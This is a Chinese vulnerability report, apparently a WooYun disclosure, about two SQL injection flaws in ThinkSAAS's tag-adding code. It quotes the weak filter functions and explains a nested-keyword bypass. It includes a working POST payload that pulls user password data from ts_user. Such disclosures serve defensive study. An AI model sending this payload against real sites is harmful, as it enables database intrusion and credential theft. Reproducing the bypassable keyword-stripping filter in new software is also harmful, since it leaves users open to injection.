ThinkSAAS最新版绕过过滤继续注入2处

### 简要描述： ThinkSAAS最新版绕过过滤继续注入2处 无视gpc，无需登录 ### 详细说明： 之前这个漏洞有 ′ 雨。分析过： [WooYun: Thinksaas某处绕过过滤的注射漏洞](http://www.wooyun.org/bugs/wooyun-2014-050236) 现在官方有最新版，做了修改，加了过滤，但是过滤不严格，可以绕过继续注入。 第一处： 现在最新的代码/app/tag/action/add_ajax.php ``` case "do": $objname = t($_POST['objname']); $idname = tsFilter(t($_POST['idname'])); $objid = t($_POST['objid']); $tags = t($_POST['tags']); $new['tag']->addTag($objname,$idname,$objid,$tags); echo "<script language=JavaScript>parent.window.location.reload();</script>"; break; ``` 在原来的$idname = t($_POST['idname']);基础上加了过滤函数tsFilter 这里进行了双层过滤，t过滤了很多字符，而tsFilter过滤注入关键字。 ``` function t($text) { $text = preg_replace ( '/\[.*?\]/is', '', $text ); $text = cleanJs ( $text ); // 彻底过滤空格BY QINIAO $text = preg_replace ( '/\s(?=\s)/', '', $text ); $text = preg_replace ( '/[\n\r\t]/', ' ', $text ); $text = str_replace ( ' ', ' ', $text ); // $text = str_replace ( ' ', '', $text ); $text = str_replace ( '&nbsp;', '', $text ); $text = str_replace ( '&', '', $text ); $text = str_replace ( '=', '', $text ); $text = str_replace ( '-', '', $text ); $text = str_replace ( '#', '', $text ); $text = str_replace ( '%', '', $text ); $text = str_replace ( '!', '', $text ); $text = str_replace ( '@', '', $text ); $text = str_replace ( '^', '', $text ); $text = str_replace ( '*', '', $text ); $text = str_replace ( 'amp;', '', $text ); $text = str_replace ( 'position', '', $text ); $text = strip_tags ( $text ); $text = htmlspecialchars ( $text ); $text = str_replace ( "'", "", $text ); return $text; } ``` 过滤字符的。 ``` function tsFilter($value){ $value = trim($value); //定义不允许提交的SQl命令和关键字 $words = array(); $words[] = "add "; $words[] = "and "; $words[] = "count "; $words[] = "order "; $words[] = "table "; $words[] = "by "; $words[] = "create "; $words[] = "delete "; $words[] = "drop "; $words[] = "from "; $words[] = "grant "; $words[] = "insert "; $words[] = "select "; $words[] = "truncate "; $words[] = "update "; $words[] = "use "; $words[] = "--"; $words[] = "#"; $words[] = "group_concat"; $words[] = "column_name"; $words[] = "information_schema.columns"; $words[] = "table_schema"; $words[] = "union "; $words[] = "where "; $words[] = "alert"; $value = strtolower($value);//转换为小写 foreach($words as $word){ if(strstr($value,$word)){ $value = str_replace($word,'',$value); } } return $value; } ``` 过滤注入关键字。 通过t函数我们可以不用这里面的这些字符就是了。 而tsFilter我们可以将“select”改为“selselect ect”,就可以绕过过滤。 下面来看看addTag函数进行添加标签处理的： ``` function addTag($objname,$idname,$objid,$tags){ ...... $tagIndexCount = $this->findCount('tag_'.$objname.'_index',array( $idname=>$objid, 'tagid'=>$tagid, )); ``` 在这里$idname 做了key，带入findCount函数。 ``` public function findCount($table, $conditions = null) { $where = ""; if (is_array ( $conditions )) { $join = array (); foreach ( $conditions as $key => $condition ) { $condition = $this->escape ( $condition ); $join [] = "{$key} = {$condition}"; } $where = "WHERE " . join ( " AND ", $join ); } else { if (null != $conditions) $where = "WHERE " . $conditions; } $sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}"; $result = $this->db->once_fetch_assoc ( $sql ); return $result ['ts_counter']; } ``` 这里只是对value做了过滤，但是key没有过滤。 通过上面的绕过过滤，以及下面的分析，可以直接注入了。 第二处注入在add.php文件 ``` case "do": $objname = tsFilter($_POST['objname']); $idname = tsFilter($_POST['idname']); $objid = intval($_POST['objid']); $tags = t($_POST['tags']); $new['tag']->addTag($objname,$idname,$objid,$tags); tsNotice('标签添加成功！'); break; ``` 同样是进行addtag，但是这里没有t函数，只有一个tsFilter函数进行过滤，注入起来更容易了。 其他跟上面第一处注入是过程一样的。 ### 漏洞证明： 发送请求： 链接：http://localhost/thinksaas/index.php?app=tag&ac=add_ajax&ts=do POST：objid=111111&objname=article&idname=111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a&tags=idname [<img src="https://images.seebug.org/upload/201403/1118420066bcfde98a0e28333a78ca047c121624.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1118420066bcfde98a0e28333a78ca047c121624.png) [<img src="https://images.seebug.org/upload/201403/111842080eef7c6d787561d3f093ecc884380315.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/111842080eef7c6d787561d3f093ecc884380315.png)